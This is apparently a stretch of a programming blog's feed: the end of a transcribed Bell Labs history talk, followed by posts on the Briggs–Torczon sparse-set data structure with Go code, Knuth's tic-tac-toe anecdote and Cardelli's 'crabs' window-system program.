By and large, from that time forth, the acoustics department stopped making hardware. It was much easier to do signal processing digitally than the previous ways, which had been analog. Blodi had an interesting property. It was the only programming language I know where -- this is not my original observation, Vyssotsky said -- where you could take the deck of cards, throw it up the stairs, and pick them up at the bottom of the stairs, feed them into the computer again, and get the same program out. Aside from syntax diagnostics, Blodi had just one diagnostic for when it would fail to compile, and that was "somewhere in your system is a loop that consists of all delays or has no delays" and you can imagine how they handled that.</p>
<p class=pp><span style="font-size: 0.7em;">35:09</span>
Another interesting programming language of the 60s was <a href="http://www.knowltonmosaics.com/">Ken Knowlton</a>’s <a href="http://beflix.com/beflix.php">Beflix</a>. This was for making movies on something with resolution kind of comparable to 640x480, really coarse, and the
programming notion in here was bugs. You put on your grid a bunch of bugs, and each bug carried along some data as baggage,
and then you would do things like cellular automata operations. You could program it or you could kind of let it go by itself. If a red bug is next to a blue bug then it turns into a green bug on the following step and so on. <span style="font-size: 0.7em;">36:28</span> He and Lillian Schwartz made some interesting abstract movies at the time. It also did some interesting picture processing. One wonderful picture of a reclining nude, something about the size of that blackboard over there, all made of pixels about a half inch high each with a different little picture in it, picked out for their density, and so if you looked at it close up it consisted of pickaxes and candles and dogs, and if you looked at it far enough away, it was a <a href="http://blog.the-eg.com/2007/12/03/ken-knowlton-mosaics/">reclining nude</a>. That picture got a lot of play all around the country.</p>
<p class=pp>Lorinda Cherry: That was with Leon, wasn’t it? That was with <a href="https://en.wikipedia.org/wiki/Leon_Harmon">Leon Harmon</a>.</p>
<p class=pp>Doug: Was that Harmon?</p>
<p class=pp>Lorinda: ?...?</p>
<p class=pp>Doug: Harmon was also an interesting character. He did more things than pictures. I’m glad you reminded me of him. I had him written down here. Harmon was a guy who among other things did a block diagram compiler for writing a handwriting recognition program. I never did understand how his scheme worked, and in fact I guess it didn’t work too well. [laughter]
It didn’t do any production ?things? but it was an absolutely
immense sample data circuit for doing handwriting recognition.
Harmon’s most famous work was trying to estimate the information content in a face. And every one of these pictures which are a cliche now, that show a face digitized very coarsely, go back to Harmon’s <a href="https://web.archive.org/web/20080807162812/http://www.doubletakeimages.com/history.htm">first psychological experiments</a>, when he tried to find out how many bits of picture he needed to try to make a face recognizable. He went around and digitized about 256 faces from Bell Labs and did real psychological experiments asking which faces could be distinguished from other ones. I had the good fortune to have one of the most distinguishable faces, and consequently you’ll find me in freshman psychology texts through no fault of my own.</p>
<p class=pp><span style="font-size: 0.7em;">39:15</span>
Another thing going on in the 60s was the halting beginning here of interactive computing. And again the credit has to go to the acoustics research department, for good and sufficient reason. They wanted to be able to feed signals into the machine, and look at them, and get them back out. They bought yet another weird architecture machine called the <a href="http://www.piercefuller.com/library/pb250.html">Packard Bell 250</a>, where the memory elements were <a href="http://en.wikipedia.org/wiki/Delay_line_memory">mercury delay lines</a>.</p>
<p class=pp>Question: Packard Bell?</p>
<p class=pp>Doug: Packard Bell, same one that makes PCs today.</p>
<p class=pp><span style="font-size: 0.7em;">40:10</span>
They hung this off of the comp center 7090 and put in a scheme for quickly shipping jobs into the job stream on the 7090. The Packard Bell was the real-time terminal that you could play with and repair stuff, ?...? off the 7090, get it back, and then you could play it. From that grew some graphics machines also, built by ?...? et al. And it was one of the old graphics machines
in fact that Ken picked up to build Unix on.</p>
<p class=pp><span style="font-size: 0.7em;">40:55</span>
Another thing that went on in the acoustics department was synthetic speech and music. <a href="http://csounds.com/mathews/index.html">Max Mathews</a>, who was the director of the department, has long been interested in computer music. In fact since retirement he spent a lot of time with Pierre Boulez in Paris at a wonderful institute with lots of money simply for making synthetic music. He had a language called Music 5. Synthetic speech or, well first of all simply speech processing was pioneered particularly by <a href="http://en.wikipedia.org/wiki/John_Larry_Kelly,_Jr">John Kelly</a>. I remember my first contact with speech processing. It was customary for computer operators, for the benefit of computer operators, to put a loudspeaker on the low bit of some register on the machine, and normally the operator would just hear kind of white noise. But if you got into a loop, suddenly the machine would scream, and this signal could be used to tell the operator "oh, the machine’s in a loop. Go stop it and go on to the next job." I remember feeding them an Ackermann’s function routine once. [laughter] They were right. It was a silly loop. But anyway. One day, the operators were ?...?. The machine started singing. Out of the blue. “Help! I’m caught in a loop.” [laughter] And in a broad Texas accent, which was the recorded voice of John Kelly.</p>
<p class=pp><span style="font-size: 0.7em;">43:14</span>
However. From there Kelly went on to do some speech synthesis. Of course there’s been a lot more speech synthesis work done since, by <span style="font-size: 0.7em;">43:31</span> folks like Cecil Coker, Joe Olive. But they produced a record, which unfortunately I can’t play because records are not modern anymore. And everybody got one: the Bell Labs Record, which is a magazine, once contained a record from the acoustics department, with both speech and music and one very famous combination where the computer played and sang "A Bicycle Built For Two".</p>
<p class=pp>?...?</p>
<p class=pp><span style="font-size: 0.7em;">44:32</span>
At the same time as all this stuff is going on here, needless
to say computing is going on in the rest of the Labs. It was about early 1960 when the math department lost its monopoly on computing machines and other people started buying them too, but for switching. The first experiments with switching computers were operational in around 1960. They were planned for several years prior to that; essentially as soon as the transistor was invented, the making of electronic rather than electromechanical switching machines was anticipated. Part of the saga of the switching machines is cheap memory. These machines had enormous memories -- thousands of words. [laughter] And it was said that the present worth of each word of memory that programmers saved across the Bell System was something like eleven dollars, as I recall. And it was worthwhile to struggle to save some memory. Also, programs were permanent. You were going to load up the switching machine with the switching program and that was going to run. You didn’t change it every minute or two. And it would be cheaper to put it in read-only memory than in core memory. And there was a whole series of wild read-only memories, both tried and built.
The first experimental Essex System had a thing called the flying spot store
which was large photographic plates with bits on them and CRTs projecting on the plates and you would detect underneath on the photodetector whether the bit was set or not. That was the program store of Essex. The program store of the first ESS systems consisted of twistors, which I actually am not sure I understand to this day, but they consist of iron wire with a copper wire wrapped around them and vice versa. There were also experiments with an IC type memory called the waffle iron. Then there was a period when magnetic bubbles were all the rage. As far as I know, although microelectronics made a lot of memory, most of the memory work at Bell Labs has not had much effect on ?...?. Nice tries though.</p>
<p class=pp><span style="font-size: 0.7em;">48:28</span>
Another thing that folks began to work on was the application of (and of course, right from the start) computers to data processing. When you own equipment scattered through every street in the country, and you have a hundred million customers, and you have bills for a hundred million transactions a day, there’s really some big data processing going on. And indeed in the early 60s, AT&T was thinking of making its own data processing computers solely for billing. Somehow they pulled out of that, and gave all the technology to IBM, and one piece of that technology went into use in high-end equipment called tractor tapes. Inch-wide magnetic tapes that were used for a while.</p>
<p class=pp><span style="font-size: 0.7em;">49:50</span>
By and large, although Bell Labs has participated until fairly recently in data processing in quite a big way, AT&T never really quite trusted the Labs to do it right because here is where the money is. I can recall one occasion when, during a strike, a temporary fill-in employee from the
Laboratories and so on lost a day’s billing tape in Chicago. And that was a million dollars. And, generally speaking, the money people did not until fairly recently trust Bell Labs to take good care of money, even though they trusted the Labs very well to make extremely reliable computing equipment for switches.
The downtime on switches is still spectacular by any industry standards. The design for the first ones was two hours down in 40 years, and the design was met. Great emphasis on reliability and redundancy, testing.</p>
<p class=pp><span style="font-size: 0.7em;">51:35</span>
Another branch of computing was for the government. The whole Whippany Laboratories [time check]
Whippany, where we took on contracts for the government particularly in the computing area in anti-missile defense, missile defense, and underwater sound. Missile defense was a very impressive undertaking. It was about in the early ’63 time frame when it was estimated the amount of computation to do a reasonable job of tracking incoming missiles would be 30 M floating point operations a second. In the day of the Cray that doesn’t sound like a great lot, but it’s more than your high-end PCs can do. And the machines were supposed to be reliable. They designed the machines at Whippany, a twelve-processor multiprocessor, to no specs, enormously rugged, one-watt transistors. This thing in real life performed remarkably well. There were sixty-five missile shots, tests across the Pacific Ocean ?...? and Lorinda Cherry here actually sat there waiting for them to come in. [laughter] And only a half dozen of them really failed. As a measure of the interest in reliability, one of them failed apparently due to processor error. Two people were assigned to look at the dumps -- enormous amounts of telemetry and logging information were taken during these tests, which are truly expensive to run. Two people were assigned to look at the dumps. A year later they had not found the trouble. The team was beefed up. They finally decided that there was a race condition in one circuit. They then realized that this particular kind of race condition had not been tested for in all the simulations. They went back and simulated the entire hardware system to see if there was a remote possibility of any similar cases, found twelve of them, and changed the hardware. But to spend over a year looking for a bug is a sign of what reliability meant.</p>
<p class=pp><span style="font-size: 0.7em;">54:56</span>
Since I’m coming up on the end of an hour, one could go on and on and on,</p>
<p class=pp>Crowd: go on, go on. [laughter]</p>
<p class=pp><span style="font-size: 0.7em;">55:10</span>
Doug: I think I’d like to end up by mentioning a few of the programs that have been written at Bell Labs that I think are most surprising. Of course there are lots of grand programs that have been written.</p>
<p class=pp>I already mentioned the block diagram compiler.</p>
<p class=pp>Another really remarkable piece of work was <a href="eqn.pdf">eqn</a>, the equation
typesetting language by Lorinda Cherry and Brian Kernighan, which has been imitated since. The notion of taking an auditory syntax, the way people talk about equations, but only talk -- this was not borrowed from any written notation before -- and getting the auditory one down on paper, that was very successful and surprising.</p>
<p class=pp>Another of my favorites, and again Lorinda Cherry was in this one, with Bob Morris, was typo. This was a program for finding spelling errors. It didn’t know the first thing about spelling. It would read a document, measure its statistics, and print out the words of the document in increasing order of what it thought the likelihood of that word having come from the same statistical source as the document. The words that did not come from the statistical source of the document were likely to be typos, and now I mean typos as distinct from spelling errors, where you actually hit the wrong key. Those tend to be off the wall, whereas phonetic spelling errors you’ll never find. And this worked remarkably well. Typing errors would come right up to the top of the list. A really really neat program.</p>
<p class=pp><span style="font-size: 0.7em;">57:50</span>
Another one of my favorites was by Brenda Baker called <a href="http://doi.acm.org/10.1145/800168.811545">struct</a>, which took Fortran programs and converted them into a structured programming language called Ratfor, which was Fortran with C syntax. This seemed like a possible undertaking, like something you do by the seat of the pants and you get something out. In fact, folks at Lockheed had done things like that before. But Brenda managed to find theorems that said there’s really only one form, there’s a canonical form into which you can structure a Fortran program, and she did this. It took your Fortran program, completely mashed it, put it out almost certainly in a different order than it was in the Fortran connected by GOTOs, without any GOTOs, and the really remarkable thing was that authors of the program, who clearly knew the way they wrote it in the first place, preferred it after it had been rearranged by Brenda. I was astonished at the outcome of that project.</p>
<p class=pp><span style="font-size: 0.7em;">59:19</span>
Another first that happened around here was by Fred Grampp, who got interested in computer security. One day he decided he would make a program for sniffing the security arrangements on a computer, as a service: Fred would never do anything crooked. [laughter] This particular program did a remarkable job, and founded a whole minor industry within the company. A department was set up to take this idea and parlay it, and indeed ever since there has been some improvement in the way computer centers are managed, at least until we got Berkeley Unix.</p>
<p class=pp><span style="font-size: 0.7em;">60:24</span>
And the last interesting program that I have time to mention is one by <a href="http://www.cs.jhu.edu/~kchurch/">Ken Church</a>. He was dealing with -- text processing has always been a continuing ?...? of the research, and in some sense it has an application to our business because we’re handling speech, but he got into consulting with the department in North Carolina that has to translate manuals. There are millions of pages of manuals in the Bell System and its successors, and ever since we’ve gone global, these things had to get translated into many languages.</p>
<p class=pp><span style="font-size: 0.7em;">61:28</span>
To help in this, he was making tools which would put up on the screen, graphed on the screen quickly a piece of text and its translation, because a translator, particularly a technical translator, wants to know, the last time we mentioned this word how was it translated. You don’t want to be creative in translating technical text. You’d like to be able to go back into the archives and pull up examples of translated text. And the neat thing here is the idea for how do you align texts in two languages. You’ve got the original, you’ve got the translated one, how do you bring up on the screen, the two sentences that go together? And the following scam worked beautifully. This is on western languages. <span style="font-size: 0.7em;">62:33</span>
Simply look for common four-letter tetragrams, four-letter combinations between the two, and as best as you can, line them up as nearly linearly with the lengths of the two texts as possible. And this <a href="church-tetragram.pdf">very simple idea</a> works like a storm. Something for nothing. I like that.</p>
<p class=pp><span style="font-size: 0.7em;">63:10</span>
The last thing is one slogan that sort of got started with Unix and is just rife within the industry now. Software tools. We were making software tools in Unix before we knew we were, just like the Molière character was amazed at discovering he’d been speaking prose all his life. [laughter] But then <a href="http://www.amazon.com/-/dp/020103669X">Kernighan and Plauger</a> came along and christened what was going on, making simple generally useful and compositional programs to do one thing and do it well and to fit together. They called it software tools, made a book, wrote a book, and this notion now is abroad in the industry. And it really did begin all up in the little attic room where you [points?] sat for many years writing up here.</p>
<p class=pp> Oh I forgot to. I haven’t used any slides. I’ve brought some, but I don’t like looking at bullets and you wouldn’t either, and I forgot to show you the one exhibit I brought, which I borrowed from Bob Kurshan. When Bell Labs was founded, it had of course some calculating machines, and it had one wonderful computer. This. That was bought in 1918. There’s almost no other computing equipment from any time prior to ten years ago that still exists in Bell Labs. This is an <a href="http://infolab.stanford.edu/pub/voy/museum/pictures/display/2-5-Mechanical.html">integraph</a>. It has two styluses. You trace a curve on a piece of paper with one stylus and the other stylus draws the indefinite integral here. There was somebody in the math department who gave this service to the whole company, with about 24 hours turnaround time, calculating integrals. Our recent vice president Arno Penzias actually did, he calculated integrals differently, with a different background. He had a chemical balance, and he cut the curves out of the paper and weighed them. This was bought in 1918, so it’s eighty years old. It used to be shiny metal, it’s a little bit rusty now. But it still works.</p>
<p class=pp><span style="font-size: 0.7em;">66:30</span>
Well, that’s a once-over lightly of a whole lot of things that have gone on at Bell Labs. It’s just such a fun place that, as I said, I could just go on and on. If you’re interested, there actually is a history written. This is only one of about six volumes; <a href="http://www.amazon.com/gp/product/0932764061">this</a> is the one that has the mathematical and computer sciences, the kind of things that I’ve mostly talked about here. A few people have copies of them. For some reason, the AT&T publishing house thinks that because they’re history they’re obsolete, and they stopped printing them. [laughter]</p>
<p class=pp>Thank you, and that’s all.</p></p>
Using Uninitialized Memory for Fun and Profittag:research.swtch.com,2012:research.swtch.com/sparse2008-03-14T00:00:00-04:002008-03-14T00:00:00-04:00An unusual but very useful data structure
<p><p class=lp>
This is the story of a clever trick that's been around for
at least 35 years, in which array values can be left
uninitialized and then read during normal operations,
yet the code behaves correctly no matter what garbage
is sitting in the array.
Like the best programming tricks, this one is the right tool for the
job in certain situations.
The sleaziness of uninitialized data
access is offset by performance improvements:
some important operations change from linear
to constant time.
</p>
<p class=pp>
Alfred Aho, John Hopcroft, and Jeffrey Ullman's 1974 book
<i>The Design and Analysis of Computer Algorithms</i>
hints at the trick in an exercise (Chapter 2, exercise 2.12):
</p>
<blockquote>
Develop a technique to initialize an entry of a matrix to zero
the first time it is accessed, thereby eliminating the <i>O</i>(||<i>V</i>||<sup>2</sup>) time
to initialize an adjacency matrix.
</blockquote>
<p class=lp>
Jon Bentley's 1986 book <a href="http://www.cs.bell-labs.com/cm/cs/pearls/"><i>Programming Pearls</i></a> expands
on the exercise (Column 1, exercise 8; <a href="http://www.cs.bell-labs.com/cm/cs/pearls/sec016.html">exercise 9</a> in the Second Edition):
</p>
<blockquote>
One problem with trading more space for less time is that
initializing the space can itself take a great deal of time.
Show how to circumvent this problem by designing a technique
to initialize an entry of a vector to zero the first time it is
accessed. Your scheme should use constant time for initialization
and each vector access; you may use extra space proportional
to the size of the vector. Because this method reduces
initialization time by using even more space, it should be
considered only when space is cheap, time is dear, and
the vector is sparse.
</blockquote>
<p class=lp>
Aho, Hopcroft, and Ullman's exercise talks about a matrix and
Bentley's exercise talks about a vector, but for now let's consider
just a simple set of integers.
</p>
<p class=pp>
One popular representation of a set of <i>n</i> integers ranging
from 0 to <i>m</i> is a bit vector, with 1 bits at the
positions corresponding to the integers in the set.
Adding a new integer to the set, removing an integer
from the set, and checking whether a particular integer
is in the set are all very fast constant-time operations
(just a few bit operations each).
Unfortunately, two important operations are slow:
iterating over all the elements in the set
takes time <i>O</i>(<i>m</i>), as does clearing the set.
If the common case is that
<i>m</i> is much larger than <i>n</i>
(that is, the set is only sparsely
populated) and iterating or clearing the set
happens frequently, then it could be better to
use a representation that makes those operations
more efficient. That's where the trick comes in.
</p>
<p class=pp>
Preston Briggs and Linda Torczon's 1993 paper,
“<a href="http://citeseer.ist.psu.edu/briggs93efficient.html"><b>An Efficient Representation for Sparse Sets</b></a>,”
describes the trick in detail.
Their solution represents the sparse set using an integer
array named <code>dense</code> and an integer <code>n</code>
that counts the number of elements in <code>dense</code>.
The <code>dense</code> array is simply a packed list of the elements in the
set, stored in order of insertion.
If the set contains the elements 5, 1, and 4, then <code>n = 3</code> and
<code>dense[0] = 5</code>, <code>dense[1] = 1</code>, <code>dense[2] = 4</code>:
</p>
<center>
<img src="https://research.swtch.com/sparse0.png" />
</center>
<p class=pp>
Together <code>n</code> and <code>dense</code> are
enough information to reconstruct the set, but this representation
is not very fast.
To make it fast, Briggs and Torczon
add a second array named <code>sparse</code>
which maps integers to their indices in <code>dense</code>.
Continuing the example,
<code>sparse[5] = 0</code>, <code>sparse[1] = 1</code>,
<code>sparse[4] = 2</code>.
Essentially, the set is a pair of arrays that point at
each other:
</p>
<center>
<img src="https://research.swtch.com/sparse0b.png" />
</center>
<p class=pp>
Adding a member to the set requires updating both of these arrays:
</p>
<pre class=indent>
add-member(i):
dense[n] = i
sparse[i] = n
n++
</pre>
<p class=lp>
It's not as efficient as flipping a bit in a bit vector, but it's
still very fast and constant time.
</p>
<p class=pp>
To check whether <code>i</code> is in the set, you verify that
the two arrays point at each other for that element:
</p>
<pre class=indent>
is-member(i):
return sparse[i] < n && dense[sparse[i]] == i
</pre>
<p class=lp>
If <code>i</code> is not in the set, then <i>it doesn't matter what <code>sparse[i]</code> is set to</i>:
either <code>sparse[i]</code>
will be bigger than <code>n</code> or it will point at a value in
<code>dense</code> that doesn't point back at it.
Either way, we're not fooled. For example, suppose <code>sparse</code>
actually looks like:
</p>
<center>
<img src="https://research.swtch.com/sparse1.png" />
</center>
<p class=lp>
<code>Is-member</code> knows to ignore
entries of <code>sparse</code> that point past <code>n</code> or that
point at cells in <code>dense</code> that don't point back
(the grayed-out entries below):
</p>
<center>
<img src="https://research.swtch.com/sparse2.png" />
</center>
<p class=pp>
Notice what just happened:
<code>sparse</code> can have <i>any arbitrary values</i> in
the positions for integers not in the set,
those values actually get used during membership
tests, and yet the membership test behaves correctly!
(This would drive <a href="http://valgrind.org/">valgrind</a> nuts.)
</p>
<p class=pp>
Clearing the set can be done in constant time:
</p>
<pre class=indent>
clear-set():
n = 0
</pre>
<p class=lp>
Zeroing <code>n</code> effectively clears
<code>dense</code> (the code only ever accesses
entries in dense with indices less than <code>n</code>), and
<code>sparse</code> can be uninitialized, so there's no
need to clear out the old values.
</p>
<p class=pp>
This sparse set representation has one more trick up its sleeve:
the <code>dense</code> array allows an
efficient implementation of set iteration.
</p>
<pre class=indent>
iterate():
for(i=0; i < n; i++)
yield dense[i]
</pre>
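<p class=pp>
To make the pieces above concrete, here is a minimal sketch of the same
representation as a small Go package. The package and the names
(<code>SparseSet</code>, <code>New</code>, <code>Has</code>, <code>Add</code>,
<code>Clear</code>, <code>Do</code>) are mine, not Briggs and Torczon's.
Go happens to zero freshly allocated slices, but the code would remain
correct even if <code>sparse</code> held arbitrary garbage, which is the
whole point of the trick.
</p>
<pre class=indent>
package sparse

// SparseSet is a sketch of the Briggs-Torczon representation for
// a set of integers in the range [0, m).
type SparseSet struct {
	dense  []int // packed list of members, in insertion order
	sparse []int // sparse[i] holds i's index in dense, if i is a member
	n      int   // number of members
}

// New returns an empty set able to hold integers in [0, m).
func New(m int) *SparseSet {
	return &SparseSet{dense: make([]int, m), sparse: make([]int, m)}
}

// Has reports whether i is in the set: the two arrays must point at each other.
func (s *SparseSet) Has(i int) bool {
	j := s.sparse[i]
	return j < s.n && s.dense[j] == i
}

// Add inserts i if it is not already a member.
func (s *SparseSet) Add(i int) {
	if s.Has(i) {
		return
	}
	s.dense[s.n] = i
	s.sparse[i] = s.n
	s.n++
}

// Clear empties the set in constant time; sparse is left untouched.
func (s *SparseSet) Clear() { s.n = 0 }

// Do calls f for each member, in insertion order.
func (s *SparseSet) Do(f func(int)) {
	for k := 0; k < s.n; k++ {
		f(s.dense[k])
	}
}
</pre>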
<p class=pp>
Let's compare the run times of a bit vector
implementation against the sparse set:
</p>
<center>
<table>
<tr>
<td><i>Operation</i>
<td align=center width=10>
<td align=center><i>Bit Vector</i>
<td align=center width=10>
<td align=center><i>Sparse set</i>
</tr>
<tr>
<td>is-member
<td>
<td align=center><i>O</i>(1)
<td>
<td align=center><i>O</i>(1)
</tr>
<tr>
<td>add-member
<td>
<td align=center><i>O</i>(1)
<td>
<td align=center><i>O</i>(1)
</tr>
<tr>
<td>clear-set
<td><td align=center><i>O</i>(<i>m</i>)
<td><td align=center><i>O</i>(1)
</tr>
<tr>
<td>iterate
<td><td align=center><i>O</i>(<i>m</i>)
<td><td align=center><i>O</i>(<i>n</i>)
</tr>
</table>
</center>
<p class=lp>
The sparse set is as fast or faster than bit vectors for
every operation. The only problem is the space cost:
two words replace each bit.
Still, there are times when the speed differences are enough
to balance the added memory cost.
Briggs and Torczon point out that liveness sets used
during register allocation inside a compiler are usually
small and are cleared very frequently, making sparse sets the
representation of choice.
</p>
<p class=pp>
Another situation where sparse sets are the better choice
is work queue-based graph traversal algorithms.
Iteration over sparse sets visits elements
in the order they were inserted (above, 5, 1, 4),
so that new entries inserted during the iteration
will be visited later in the same iteration.
In contrast, iteration over bit vectors visits elements in
integer order (1, 4, 5), so that new elements inserted
during traversal might be missed, requiring repeated
iterations.
</p>
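<p class=pp>
As an illustration of that property, here is a hypothetical reachability
routine built on the Go sketch above (same package, so the unexported
fields are visible). The <code>dense</code> array doubles as the work
queue: the loop bound grows as new nodes are appended, so nodes
discovered mid-iteration still get visited in the same pass.
</p>
<pre class=indent>
// Reachable returns the set of nodes reachable from root in a graph
// given as adjacency lists. Nodes added during the loop are appended
// to dense and picked up later in the same pass.
func Reachable(adj [][]int, root int) *SparseSet {
	visited := New(len(adj))
	visited.Add(root)
	for k := 0; k < visited.n; k++ {
		for _, next := range adj[visited.dense[k]] {
			visited.Add(next)
		}
	}
	return visited
}
</pre>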
<p class=pp>
Returning to the original exercises, it is trivial to change
the set into a vector (or matrix) by making <code>dense</code>
an array of index-value pairs instead of just indices.
Alternately, one might add the value to the <code>sparse</code>
array or to a new array.
The relative space overhead isn't as bad if you would have been
storing values anyway.
</p>
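<p class=pp>
A sketch of that variation, again with names of my own choosing:
widening <code>dense</code> to hold index-value pairs turns the set
into a sparse vector, while the membership check stays exactly the same.
</p>
<pre class=indent>
// entry pairs an index with its value.
type entry struct {
	index int
	value float64
}

// SparseVector maps a sparse subset of the indices [0, m) to values.
type SparseVector struct {
	dense  []entry
	sparse []int
	n      int
}

// NewVector returns an empty vector over the index range [0, m).
func NewVector(m int) *SparseVector {
	return &SparseVector{dense: make([]entry, m), sparse: make([]int, m)}
}

// Set stores v at index i, adding i to the vector if necessary.
func (s *SparseVector) Set(i int, v float64) {
	if j := s.sparse[i]; j < s.n && s.dense[j].index == i {
		s.dense[j].value = v
		return
	}
	s.dense[s.n] = entry{i, v}
	s.sparse[i] = s.n
	s.n++
}

// Get returns the value at index i, or 0 if i has not been set since the last clear.
func (s *SparseVector) Get(i int) float64 {
	if j := s.sparse[i]; j < s.n && s.dense[j].index == i {
		return s.dense[j].value
	}
	return 0
}
</pre>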
<p class=pp>
Briggs and Torczon's paper implements additional set
operations and examines performance speedups from
using sparse sets inside a real compiler.
</p></p>
Play Tic-Tac-Toe with Knuthtag:research.swtch.com,2012:research.swtch.com/tictactoe2008-01-25T00:00:00-05:002008-01-25T00:00:00-05:00The only winning move is not to play.
<p><p class=lp>Section 7.1.2 of the <b><a href="http://www-cs-faculty.stanford.edu/~knuth/taocp.html#vol4">Volume 4 pre-fascicle 0A</a></b> of Donald Knuth's <i>The Art of Computer Programming</i> is titled “Boolean Evaluation.” In it, Knuth considers the construction of a set of nine boolean functions telling the correct next move in an optimal game of tic-tac-toe. In a footnote, Knuth tells this story:</p>
<blockquote><p class=lp>This setup is based on an exhibit from the early 1950s at the Museum of Science and Industry in Chicago, where the author was first introduced to the magic of switching circuits. The machine in Chicago, designed by researchers at Bell Telephone Laboratories, allowed me to go first; yet I soon discovered there was no way to defeat it. Therefore I decided to move as stupidly as possible, hoping that the designers had not anticipated such bizarre behavior. In fact I allowed the machine to reach a position where it had two winning moves; and it seized <i>both</i> of them! Moving twice is of course a flagrant violation of the rules, so I had won a moral victory even though the machine had announced that I had lost.</p></blockquote>
<p class=lp>
That story alone is fairly amusing. But turning the page, the reader finds a quotation from Charles Babbage's <i><a href="http://onlinebooks.library.upenn.edu/webbin/book/lookupid?key=olbp36384">Passages from the Life of a Philosopher</a></i>, published in 1864:</p>
<blockquote><p class=lp>I commenced an examination of a game called “tit-tat-to” ... to ascertain what number of combinations were required for all the possible variety of moves and situations. I found this to be comparatively insignificant. ... A difficulty, however, arose of a novel kind. When the automaton had to move, it might occur that there were two different moves, each equally conducive to his winning the game. ... Unless, also, some provision were made, the machine would attempt two contradictory motions.</p></blockquote>
<p class=lp>
The only real winning move is not to play.</p></p>
Crabs, the bitmap terror!tag:research.swtch.com,2012:research.swtch.com/crabs2008-01-09T00:00:00-05:002008-01-09T00:00:00-05:00A destructive, pointless violation of the rules
<p><p class=lp>Today, window systems seem as inevitable as hierarchical file systems, a fundamental building block of computer systems. But it wasn't always that way. This paper could only have been written in the beginning, when everything about user interfaces was up for grabs.</p>
<blockquote><p class=lp>A bitmap screen is a graphic universe where windows, cursors and icons live in harmony, cooperating with each other to achieve functionality and esthetics. A lot of effort goes into making this universe consistent, the basic law being that every window is a self contained, protected world. In particular, (1) a window shall not be affected by the internal activities of another window. (2) A window shall not be affected by activities of the window system not concerning it directly, i.e. (2.1) it shall not notice being obscured (partially or totally) by other windows or obscuring (partially or totally) other windows, (2.2) it shall not see the <i>image</i> of the cursor sliding on its surface (it can only ask for its position).</p>
<p class=pp>
Of course it is difficult to resist the temptation to break these rules. Violations can be destructive or non-destructive, useful or pointless. Useful non-destructive violations include programs printing out an image of the screen, or magnifying part of the screen in a <i>lens</i> window. Useful destructive violations are represented by the <i>pen</i> program, which allows one to scribble on the screen. Pointless non-destructive violations include a magnet program, where a moving picture of a magnet attracts the cursor, so that one has to continuously pull away from it to keep working. The first pointless, destructive program we wrote was <i>crabs</i>.</p>
</blockquote>
<p class=lp>As the crabs walk over the screen, they leave gray behind, “erasing” the apps underfoot:</p>
<blockquote><img src="https://research.swtch.com/crabs1.png">
</blockquote>
<p class=lp>
For the rest of the story, see Luca Cardelli's “<a style="font-weight: bold;" href="http://lucacardelli.name/Papers/Crabs.pdf">Crabs: the bitmap terror!</a>” (6.7MB). Additional details in “<a href="http://lucacardelli.name/Papers/Crabs%20%28History%20and%20Screen%20Dumps%29.pdf">Crabs (History and Screen Dumps)</a>” (57.1MB).</p></p>